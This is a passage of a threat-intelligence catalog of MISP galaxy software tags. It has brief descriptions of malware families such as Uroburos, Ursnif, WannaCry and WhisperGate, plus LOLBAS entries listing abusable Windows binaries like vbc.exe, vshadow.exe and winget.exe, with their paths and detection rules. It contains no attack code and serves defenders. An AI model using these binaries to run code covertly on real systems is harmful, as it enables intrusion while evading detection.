Detection: * Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml) * IOC: Update.exe spawned an unknown process<sup>[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]</sup>

The tag is: misp-galaxy:software="Update"

ANEL - Associated Software

The tag is: misp-galaxy:software="ANEL - Associated Software"

UPPERCUT

The tag is: misp-galaxy:software="UPPERCUT"

Url.dll - Associated Software

<sup>[[Url.dll - LOLBAS Project](/references/0c88fb72-6be5-4a01-af1c-553650779253)]</sup>

The tag is: misp-galaxy:software="Url.dll - Associated Software"

Snake - Associated Software

<sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup>

The tag is: misp-galaxy:software="Snake - Associated Software"

Uroburos

[Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is a sophisticated cyber espionage tool written in C that has been used by units within Russia’s Federal Security Service (FSB) associated with the [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.<sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup><sup>[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]</sup>

The tag is: misp-galaxy:software="Uroburos"

Gozi-ISFB - Associated Software

The tag is: misp-galaxy:software="Gozi-ISFB - Associated Software"

Dreambot - Associated Software

The tag is: misp-galaxy:software="Dreambot - Associated Software"

PE_URSNIF - Associated Software

The tag is: misp-galaxy:software="PE_URSNIF - Associated Software"

Ursnif

[Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)s, and malicious links.<sup>[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)]</sup><sup>[[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)]</sup> [Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.<sup>[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]</sup>

The tag is: misp-galaxy:software="Ursnif"

USBferry

[USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) is an information stealing malware and has been used by [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) shares an overlapping codebase with [YAHOYAH](https://app.tidalcyber.com/software/0844bc42-5c29-47c3-b1b3-6bfffbf1732a), though it has several features which makes it a distinct piece of malware.<sup>[[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]</sup>

The tag is: misp-galaxy:software="USBferry"

USB Stealer - Associated Software

The tag is: misp-galaxy:software="USB Stealer - Associated Software"

Win32/USBStealer - Associated Software

The tag is: misp-galaxy:software="Win32/USBStealer - Associated Software"

USBStealer

[USBStealer](https://app.tidalcyber.com/software/50eab018-8d52-46f5-8252-95942c2c0a89) is malware that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee). <sup>[[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)]</sup> <sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup>

The tag is: misp-galaxy:software="USBStealer"

UtilityFunctions.ps1 - Associated Software

<sup>[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]</sup>

The tag is: misp-galaxy:software="UtilityFunctions.ps1 - Associated Software"

UtilityFunctions

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1

Detection: * Sigma: proc_creation_win_lolbas_utilityfunctions.yml<sup>[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]</sup>

The tag is: misp-galaxy:software="UtilityFunctions"

Valak

[Valak](https://app.tidalcyber.com/software/b149f12f-3cf4-4547-841d-c63b7677547d) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.<sup>[[Cybereason Valak May 2020](https://app.tidalcyber.com/references/235d1cf1-2413-4620-96cf-083d348410c2)]</sup><sup>[[Unit 42 Valak July 2020](https://app.tidalcyber.com/references/9a96da13-5795-49bc-ab82-dfd4f964d9d0)]</sup>

The tag is: misp-galaxy:software="Valak"

VaporRage

The tag is: misp-galaxy:software="VaporRage"

Vasport

The tag is: misp-galaxy:software="Vasport"

vbc.exe - Associated Software

<sup>[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]</sup>

The tag is: misp-galaxy:software="vbc.exe - Associated Software"

vbc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Visual Basic .NET command-line compiler, used to compile VB.NET source code (not VBScript) into an executable

Author: Lior Adar

Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_visual_basic_compiler.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml) * Elastic: defense_evasion_dotnet_compiler_parent_process.toml<sup>[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]</sup>

The tag is: misp-galaxy:software="vbc"

VBShower

The tag is: misp-galaxy:software="VBShower"

Verclsid.exe - Associated Software

<sup>[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup>

The tag is: misp-galaxy:software="Verclsid.exe - Associated Software"

Verclsid

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to verify a COM object before it is instantiated by Windows Explorer

Author: @bohops

Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe

Detection: * Sigma: [proc_creation_win_verclsid_runs_com.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml) * Splunk: verclsid_clsid_execution.yml<sup>[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup>

The tag is: misp-galaxy:software="Verclsid"

VERMIN

[VERMIN](https://app.tidalcyber.com/software/afa4023f-aa2e-45d6-bb3c-38e61f876eac) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. <sup>[[Unit 42 VERMIN Jan 2018](https://app.tidalcyber.com/references/0d6db249-9368-495e-9f1f-c7f10041f5ff)]</sup>

The tag is: misp-galaxy:software="VERMIN"

Vidar Stealer

Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today’s most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware’s stealth.<sup>[[Minerva Labs Vidar Stealer Evasion](/references/ce9714d3-7f7c-4068-bcc8-0f0eeaf0dc0b)]</sup>

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

The tag is: misp-galaxy:software="Vidar Stealer"

VisualUiaVerifyNative.exe - Associated Software

<sup>[[VisualUiaVerifyNative.exe - LOLBAS Project](/references/b17be296-15ad-468f-8157-8cb4093b2e97)]</sup>

The tag is: misp-galaxy:software="VisualUiaVerifyNative.exe - Associated Software"

VisualUiaVerifyNative

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe

The tag is: misp-galaxy:software="VisualUiaVerifyNative"

Volgmer

[Volgmer](https://app.tidalcyber.com/software/7fcfba45-5752-4f0c-8023-db67729ae34e) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. <sup>[[US-CERT Volgmer Nov 2017](https://app.tidalcyber.com/references/c48c7ac0-8d55-4b62-9606-a9ce420459b6)]</sup>

The tag is: misp-galaxy:software="Volgmer"

VSDiagnostics.exe - Associated Software

<sup>[[VSDiagnostics.exe - LOLBAS Project](/references/b4658fc0-af16-45b1-8403-a9676760a36a)]</sup>

The tag is: misp-galaxy:software="VSDiagnostics.exe - Associated Software"

VSDiagnostics

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command-line tool used for performing diagnostics.

Author: Bobby Cooke

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe

The tag is: misp-galaxy:software="VSDiagnostics"

Vshadow.exe - Associated Software

<sup>[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]</sup>

The tag is: misp-galaxy:software="Vshadow.exe - Associated Software"

Vshadow

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.

Author: Ayberk Halaç

Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe

Detection: * IOC: vshadow.exe usage with -exec parameter<sup>[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]</sup>

The tag is: misp-galaxy:software="Vshadow"

VSIISExeLauncher.exe - Associated Software

<sup>[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]</sup>

The tag is: misp-galaxy:software="VSIISExeLauncher.exe - Associated Software"

VSIISExeLauncher

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary will execute specified binary. Part of VS/VScode installation.

Author: timwhite

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe

Detection: * Sigma: [proc_creation_win_lolbin_vsiisexelauncher.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml) * IOC: VSIISExeLauncher.exe spawned an unknown process<sup>[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]</sup>

The tag is: misp-galaxy:software="VSIISExeLauncher"

vsjitdebugger.exe - Associated Software

<sup>[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]</sup>

The tag is: misp-galaxy:software="vsjitdebugger.exe - Associated Software"

vsjitdebugger

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Just-In-Time (JIT) debugger included with Visual Studio

Author: Oddvar Moe

Paths: * c:\windows\system32\vsjitdebugger.exe

Detection: * Sigma: proc_creation_win_susp_use_of_vsjitdebugger_bin.yml<sup>[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]</sup>

The tag is: misp-galaxy:software="vsjitdebugger"

vsls-agent.exe - Associated Software

<sup>[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]</sup>

The tag is: misp-galaxy:software="vsls-agent.exe - Associated Software"

vsls-agent

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Agent for Visual Studio Live Share (Code Collaboration)

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe

Detection: * Sigma: proc_creation_win_vslsagent_agentextensionpath_load.yml<sup>[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]</sup>

The tag is: misp-galaxy:software="vsls-agent"

vstest.console.exe - Associated Software

<sup>[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]</sup>

The tag is: misp-galaxy:software="vstest.console.exe - Associated Software"

vstest.console

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VSTest.Console.exe is the command-line tool to run tests

Author: Onat Uzunyayla

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe

Detection: * IOC: vstest.console.exe spawning unexpected processes<sup>[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]</sup>

The tag is: misp-galaxy:software="vstest.console"

Wab.exe - Associated Software

<sup>[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]</sup>

The tag is: misp-galaxy:software="Wab.exe - Associated Software"

Wab

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows address book manager

Author: Oddvar Moe

Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe

Detection: * Sigma: [registry_set_wab_dllpath_reg_change.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml) * IOC: WAB.exe should normally never be used<sup>[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]</sup>

The tag is: misp-galaxy:software="Wab"

WanaCrypt0r - Associated Software

The tag is: misp-galaxy:software="WanaCrypt0r - Associated Software"

WCry - Associated Software

The tag is: misp-galaxy:software="WCry - Associated Software"

WanaCry - Associated Software

The tag is: misp-galaxy:software="WanaCry - Associated Software"

WanaCrypt - Associated Software

The tag is: misp-galaxy:software="WanaCrypt - Associated Software"

WannaCry

[WannaCry](https://app.tidalcyber.com/software/6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.<sup>[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)]</sup><sup>[[US-CERT WannaCry 2017](https://app.tidalcyber.com/references/349b8e9d-7172-4d01-b150-f0371d038b7e)]</sup><sup>[[Washington Post WannaCry 2017](https://app.tidalcyber.com/references/bbf9b08a-072c-4fb9-8c3c-cb6f91e8940c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup>

The tag is: misp-galaxy:software="WannaCry"

Ave Maria - Associated Software

<sup>[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)]</sup><sup>[[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]</sup>

The tag is: misp-galaxy:software="Ave Maria - Associated Software"

Warzone - Associated Software

The tag is: misp-galaxy:software="Warzone - Associated Software"

WarzoneRAT

[WarzoneRAT](https://app.tidalcyber.com/software/cfebe868-15cb-4be5-b7ed-38b52f2a0722) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.<sup>[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)]</sup><sup>[[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]</sup>

The tag is: misp-galaxy:software="WarzoneRAT"

WastedLocker

[WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) is a ransomware family attributed to [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) that has been used since at least May 2020. [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) has been used against a broad variety of sectors, including manufacturing, information technology, and media.<sup>[[Symantec WastedLocker June 2020](https://app.tidalcyber.com/references/061d8f74-a202-4089-acae-687e4f96933b)]</sup><sup>[[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)]</sup><sup>[[Sentinel Labs WastedLocker July 2020](https://app.tidalcyber.com/references/5ed4eb07-cc90-46bc-8527-0bb59e1eefe1)]</sup>

The tag is: misp-galaxy:software="WastedLocker"

Waterbear

[Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030) is modular malware attributed to [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.<sup>[[Trend Micro Waterbear December 2019](https://app.tidalcyber.com/references/bf320133-3823-4232-b7d2-d07da9bbccc2)]</sup>

The tag is: misp-galaxy:software="Waterbear"

WEBC2

[WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) is a family of backdoor malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) as early as July 2006. [WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. <sup>[[Mandiant APT1 Appendix](https://app.tidalcyber.com/references/1f31c09c-6a93-4142-8333-154138c1d70a)]</sup><sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="WEBC2"

WellMess

[WellMess](https://app.tidalcyber.com/software/20725ec7-ee35-44cf-bed6-91158aa03ce4) is a lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by APT29.<sup>[[CISA WellMess July 2020](https://app.tidalcyber.com/references/40e9eda2-51a2-4fd8-b0b1-7d2c6deca820)]</sup><sup>[[PWC WellMess July 2020](https://app.tidalcyber.com/references/22794e37-3c55-444a-b659-e5a1a6bc2da0)]</sup><sup>[[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)]</sup>

The tag is: misp-galaxy:software="WellMess"

Wevtutil

[Wevtutil](https://app.tidalcyber.com/software/2bcbcea6-192a-4501-aab1-1edde53875fa) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.<sup>[[Wevtutil Microsoft Documentation](https://app.tidalcyber.com/references/25511dde-9e13-4e03-8ae4-2495e9f5eb5e)]</sup>

The tag is: misp-galaxy:software="Wevtutil"

Wfc.exe - Associated Software

<sup>[[Wfc.exe - LOLBAS Project](/references/a937012a-01c8-457c-8808-47c1753e8781)]</sup>

The tag is: misp-galaxy:software="Wfc.exe - Associated Software"

Wfc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).

Author: Jimmy (@bohops)

Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe

The tag is: misp-galaxy:software="Wfc"

WhisperGate

[WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.<sup>[[Cybereason WhisperGate February 2022](https://app.tidalcyber.com/references/464d9cac-04c7-4e57-a5d6-604fba90a982)]</sup><sup>[[Unit 42 WhisperGate January 2022](https://app.tidalcyber.com/references/3daa8c9e-da17-4eda-aa0d-df97c5de8f64)]</sup><sup>[[Microsoft WhisperGate January 2022](https://app.tidalcyber.com/references/e0c1fcd3-b7a8-42af-8984-873a6f969975)]</sup>

The tag is: misp-galaxy:software="WhisperGate"

Wiarp

The tag is: misp-galaxy:software="Wiarp"

WCE - Associated Software

The tag is: misp-galaxy:software="WCE - Associated Software"

Windows Credential Editor

The tag is: misp-galaxy:software="Windows Credential Editor"

WindTail

The tag is: misp-galaxy:software="WindTail"

Winexe

[Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is a lightweight, open source tool similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) designed to allow system administrators to execute commands on remote servers. <sup>[[Winexe Github Sept 2013](https://app.tidalcyber.com/references/7003e2d4-83e5-4672-aaa9-53cc4bcb08b5)]</sup> [Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is unique in that it is a GNU/Linux based client. <sup>[[Überwachung APT28 Forfiles June 2015](https://app.tidalcyber.com/references/3b85fff0-88d8-4df6-af0b-66e57492732e)]</sup>

The tag is: misp-galaxy:software="Winexe"

Wingbird

[Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37) is a backdoor that appears to be a version of commercial software [FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) in a May 2016 campaign. <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup>

The tag is: misp-galaxy:software="Wingbird"

winget.exe - Associated Software

<sup>[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]</sup>

The tag is: misp-galaxy:software="winget.exe - Associated Software"

winget

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Package Manager tool

Author: Paul Sanders

Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe

Detection:

* IOC: winget.exe spawned with local manifest file
* IOC: Sysmon Event ID 1 - Process Creation
* Analysis: [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html)
* Sigma: proc_creation_win_winget_local_install_via_manifest.yml<sup>[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]</sup>

The tag is: misp-galaxy:software="winget"

WinMM

The tag is: misp-galaxy:software="WinMM"

Winnti for Linux

[Winnti for Linux](https://app.tidalcyber.com/software/e384e711-0796-4cbc-8854-8c3f939faf57) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b). The Windows variant is tracked separately under [Winnti for Windows](https://app.tidalcyber.com/software/245c216e-41c3-4dec-8b23-bfc7c6a46d6e).<sup>[[Chronicle Winnti for Linux May 2019](https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]</sup>

The tag is: misp-galaxy:software="Winnti for Linux"

Winnti for Windows

[Winnti for Windows](https://app.tidalcyber.com/software/245c216e-41c3-4dec-8b23-bfc7c6a46d6e) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).<sup>[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Microsoft Winnti Jan 2017](https://app.tidalcyber.com/references/6b63fac9-4bde-4fc8-a016-e77c8485fab7)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup><sup>[[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]</sup> The Linux variant is tracked separately under [Winnti for Linux](https://app.tidalcyber.com/software/e384e711-0796-4cbc-8854-8c3f939faf57).<sup>[[Chronicle Winnti for Linux May 2019](https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]</sup>

The tag is: misp-galaxy:software="Winnti for Windows"

WinRAR

According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.<sup>[[WinRAR Website](/references/ad620d61-108c-4bb0-a897-02764ea9a903)]</sup> It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.<sup>[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]</sup>

The tag is: misp-galaxy:software="WinRAR"

winrm.vbs - Associated Software

